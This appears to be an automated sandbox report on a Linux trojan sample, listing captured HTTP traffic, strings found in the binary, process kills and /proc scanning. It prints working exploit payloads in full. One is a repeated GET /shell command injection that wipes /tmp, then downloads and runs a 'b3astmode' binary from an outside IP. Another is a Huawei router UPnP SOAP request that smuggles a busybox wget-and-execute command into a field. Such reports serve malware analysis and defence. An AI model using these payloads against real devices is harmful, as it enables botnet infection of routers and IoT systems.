    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+5.199.130.247/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: gHQh80mu53String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: gHQh80mu53String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /tmp/gHQh80mu53 (PID: 5224)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)SIGKILL sent: pid: 5224, result: successfulJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: classification engineClassification label: mal72.troj.lin@0/2@0/0
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2033/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2033/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1582/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1582/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2275/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1612/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1612/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1579/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1579/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1699/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1699/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1335/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1335/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1698/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1698/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2028/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2028/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1334/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1334/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1576/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1576/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2302/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/3236/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2025/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2025/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2146/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/910/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/912/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/912/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/759/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/759/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/517/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2307/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/918/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/918/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1594/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1594/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2285/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/2281/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1349/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1349/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1623/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1623/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/761/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/761/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1622/fdJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/1622/exeJump to behavior
    Source: /tmp/gHQh80mu53 (PID: 5245)File opened: /proc/884/fd